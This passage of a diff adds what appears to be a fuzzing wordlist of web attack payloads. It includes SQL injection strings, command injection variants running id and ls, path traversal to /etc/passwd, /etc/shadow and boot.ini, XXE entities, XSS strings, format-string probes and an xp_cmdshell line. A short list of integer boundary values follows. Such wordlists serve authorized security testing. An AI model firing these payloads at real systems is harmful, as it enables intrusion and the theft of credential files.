+ <youremail>%0d%0aBcc:<youremail>
380
+ <youremail>%0d%0aCc:<youremail>
381
+ =
382
+ ='
383
+ =--
384
+ =;
385
+ >
386
+ ?x=
387
+ ?x="
388
+ ?x=>
389
+ ?x=|
390
+ @&apos;
391
+ @'
392
+ @*
393
+ @variable
394
+ A
395
+ ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
396
+ FALSE
397
+ NULL
398
+ PRINT
399
+ PRINT @@variable
400
+ TRUE
401
+ XXXXX.%p
402
+ XXXXX`perl -e 'print ".%p" x 80'`
403
+ [&apos;]
404
+ [']
405
+ \
406
+ \";alert('XSS');//
407
+ \"blah
408
+ \&apos;
409
+ \'
410
+ \..\..\..\..\..\..\..\..\..\..\etc\passwd
411
+ \..\..\..\..\..\..\..\..\..\..\etc\passwd%00
412
+ \..\..\..\..\..\..\..\..\..\..\etc\shadow
413
+ \..\..\..\..\..\..\..\..\..\..\etc\shadow%00
414
+ \0
415
+ \00
416
+ \00\00
417
+ \00\00\00
418
+ \0\0
419
+ \0\0\0
420
+ \\
421
+ \\&apos;/bin/cat%20/etc/passwd\\&apos;
422
+ \\&apos;/bin/cat%20/etc/shadow\\&apos;
423
+ \\/
424
+ \\\\*
425
+ \\\\?\\
426
+ \n/bin/ls -al\n
427
+ \n/usr/bin/id;
428
+ \n/usr/bin/id\n
429
+ \n/usr/bin/id|
430
+ \nid;
431
+ \nid\n
432
+ \nid|
433
+ \nnetstat -a%\n
434
+ \t
435
+ \u003C
436
+ \u003c
437
+ \x23
438
+ \x27
439
+ \x27UNION SELECT
440
+ \x27\x4F\x52 SELECT *
441
+ \x27\x6F\x72 SELECT *
442
+ \x3C
443
+ \x3D \x27
444
+ \x3D \x3B'
445
+ \x3c
446
+ ^&apos;
447
+ ^'
448
+ `
449
+ `/usr/bin/id`
450
+ `dir`
451
+ `id`
452
+ `perl -e 'print ".%p" x 80'`%n
453
+ `ping 127.0.0.1`
454
+ a);/usr/bin/id
455
+ a);/usr/bin/id;
456
+ a);/usr/bin/id|
457
+ a);id
458
+ a);id;
459
+ a);id|
460
+ a)|/usr/bin/id
461
+ a)|/usr/bin/id;
462
+ a)|id
463
+ a)|id;
464
+ a;/usr/bin/id
465
+ a;/usr/bin/id;
466
+ a;/usr/bin/id|
467
+ a;id
468
+ a;id;
469
+ a;id|
470
+ http://<yourservername>/
471
+ id%00
472
+ id%00|
473
+ insert
474
+ like
475
+ limit
476
+ null
477
+ or
478
+ or 0=0 #
479
+ or 0=0 --
480
+ or 1=1--
481
+ or%201=1
482
+ or%201=1 --
483
+ response.write 111111
484
+ something%00html
485
+ update
486
+ x' or 1=1 or 'x'='y
487
+ x' or name()='username' or 'x'='y
488
+ xsstest
489
+ xsstest%00"<>'
490
+ {&apos;}
491
+ |/usr/bin/id
492
+ |/usr/bin/id|
493
+ |id
494
+ |id;
495
+ |id|
496
+ |ls
497
+ |ls -la
498
+ |nid\n
499
+ |usr/bin/id\n
500
+ ||
501
+ || ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
502
+ ||/usr/bin/id;
503
+ ||/usr/bin/id|
504
+ }
505
+ %0a
506
+ |dir|
507
+ dir%00
508
+ dir%00|
509
+ |dir
510
+ |/bin/ls -al
511
+ /boot.ini
512
+ ../../boot.ini
513
+ /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
514
+ ../../../../../../../../conf/server.xml
515
+ C:/inetpub/wwwroot/global.asa
516
+ C:\inetpub\wwwroot\global.asa
517
+ C:/boot.ini
518
+ C:\boot.ini
519
+ ../../../../../../../../../../../../localstart.asp%00
520
+ ../../../../../../../../../../../../localstart.asp
521
+ ../../../../../../../../../../../../boot.ini%00
522
+ ../../../../../../../../../../../../boot.ini
523
+ /./././././././././././boot.ini
524
+ /../../../../../../../../../../../boot.ini%00
525
+ /../../../../../../../../../../../boot.ini
526
+ /.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
527
+ \..\..\..\..\..\..\..\..\..\..\boot.ini
528
+ ..\..\..\..\..\..\..\..\..\..\boot.ini%00
529
+ ..\..\..\..\..\..\..\..\..\..\boot.ini
530
+ /../../../../../../../../../../../boot.ini%00.html
531
+ /../../../../../../../../../../../boot.ini%00.jpg
532
+ /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
533
+ &lt;!--#exec%20cmd=&quot;dir&quot;--&gt;
534
+ |
535
+ {'}
536
+ = '
537
+ = ;
538
+ = --
539
+ admin'--
540
+ ') or ('x'='x
541
+ hi" or "a"="a
542
+ hi" or 1=1 --
543
+ hi' or 1=1 --
544
+ hi' or 'a'='a
545
+ hi') or ('a'='a
546
+ hi") or ("a"="a
547
+ select
548
+ as
549
+ procedure
550
+ order by
551
+ asc
552
+ desc
553
+ delete
554
+ distinct
555
+ having
556
+ truncate
557
+ replace
558
+ handler
559
+ bfilename
560
+ exec xp
561
+ exec sp
562
+ t'exec master..xp_cmdshell 'nslookup www.google.com'--
563
+ to_timestamp_tz
564
+ tz_offset
565
+ char%4039%41%2b%40SELECT
566
+ count(/child::node())
567
+ ../../../../../../../../../../boot.ini
568
+ ../../../../../../../../../../windows/win.ini
569
+ ..\..\..\..\..\..\..\..\..\..\windows\win.ini
570
+ | ping -i 30 127.0.0.1 |
571
+ | ping -n 30 127.0.0.1 |
572
+ echo 111111
573
+ %70
574
+ .%E2%73%70
575
+ %2e0
576
+ %2e
577
+ .
578
+ ?*
579
+ %2f
580
+ %5c
581
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
582
+ "<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
583
+ "<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
584
+ other
@@ -0,0 +1,12 @@
1
+ -1
2
+ 0
3
+ 0x100
4
+ 0x1000
5
+ 0x3fffffff
6
+ 0x7ffffffe
7
+ 0x7fffffff
8
+ 0x80000000
9
+ 0xfffffffe
10
+ 0xffffffff
11
+ 0x10000
12
+ 0x100000